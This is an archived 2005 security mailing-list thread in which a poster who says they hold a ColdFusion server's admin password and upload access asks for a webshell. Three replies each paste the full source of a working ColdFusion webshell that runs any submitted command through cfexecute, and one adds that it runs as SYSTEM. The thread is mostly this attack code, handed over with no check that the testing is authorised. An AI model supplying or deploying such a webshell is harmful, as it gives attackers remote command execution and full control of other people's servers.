Discussion:
coldfusion pentest
(too old to reply)
fatb
2005-05-10 02:43:05 UTC
Permalink
Hi all guys

I've successed get the admin's passwd of the web interface

and I can upload any kinds of files to the server

the server is running coldfusion 4.5 with iis 5.0

but I can not find a coldfusion webshell to continue

anybody could be kind enough to send me a working coldfusion webshell

thx in advanced!
Kurt Grutzmacher
2005-05-10 03:13:34 UTC
Permalink
Post by fatb
anybody could be kind enough to send me a working coldfusion webshell
ColdFusion runs as SYSTEM by default. Happy trails. (de-htmlized for
hafe sex)

<html>
<body>

<cfoutput>
<table>
<form method="POST" action="cfexec.cfm">
<tr><td>Command:</td><td><input type=text
name="cmd" size=50
<cfif
isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
<tr><td>Options:</td><td> <input type=text
name="opts" size=50
<cfif
isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
<tr><td>Timeout:</td><td> <input type=text
name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<cfelse>value="5"</cfif>></td></tr>
</table>
<input type=submit value="Exec" >
</FORM>

<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Javier Reoyo
2005-05-10 08:31:54 UTC
Permalink
Hi fatb,


this is from mailing of securiteam. Try it.

ColdFusion Web Shell
------------------------------------------------------------------------


SUMMARY



DETAILS

The following source code will generate a web based shell whenever it is
executed under the ColdFusion environment.

Tool source code:
< html>
< body>

< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
< tr>
< td>Command:</td>
< td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
value="#form.cmd#" </cfif>> < br></td>
</tr>
< tr>
< td>Options:</td>
< td> < input type=text name="opts" size=50 < cfif
isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
</tr>
< tr>
< td>Timeout:</td>
< td>< input type=text name="timeout" size=4 < cfif
isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"
</cfif> > </td>
</tr>
</table>
< input type=submit value="Exec" >
</FORM>

< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">
</cfexecute>
</cfsavecontent>
< pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>


ADDITIONAL INFORMATION

The information has been provided by <mailto:***@jingojango.net> Kurt
Grutzmacher.



========================================

----- Original Message -----
From: "fatb" <***@security.zz.ha.cn>
To: <pen-***@securityfocus.com>
Cc: <full-***@lists.grok.org.uk>
Sent: Tuesday, May 10, 2005 4:43 AM
Subject: [Full-disclosure] coldfusion pentest
Post by fatb
Hi all guys
I've successed get the admin's passwd of the web interface
and I can upload any kinds of files to the server
the server is running coldfusion 4.5 with iis 5.0
but I can not find a coldfusion webshell to continue
anybody could be kind enough to send me a working coldfusion webshell
thx in advanced!
----------------------------------------------------------------------------
----
Post by fatb
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Frederic Charpentier
2005-05-10 08:25:06 UTC
Permalink
Hi fatb,

from securiteam web site :
< html>
< body>

< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
< tr>
< td>Command:</td>
< td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
value="#form.cmd#" </cfif>> < br></td>
</tr>
< tr>
< td>Options:</td>
< td> < input type=text name="opts" size=50 < cfif
isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
</tr>
< tr>
< td>Timeout:</td>
< td>< input type=text name="timeout" size=4 < cfif
isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"
</cfif> > </td>
</tr>
</table>
< input type=submit value="Exec" >
</FORM>

< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">
</cfexecute>
</cfsavecontent>
< pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>


I hope this helps. Fred
Post by fatb
Hi all guys
I've successed get the admin's passwd of the web interface
and I can upload any kinds of files to the server
the server is running coldfusion 4.5 with iis 5.0
but I can not find a coldfusion webshell to continue
anybody could be kind enough to send me a working coldfusion webshell
thx in advanced!
------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Frederic Charpentier - Xmco Partners
Security Consulting / Pentest
web : http://www.xmcopartners.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Loading...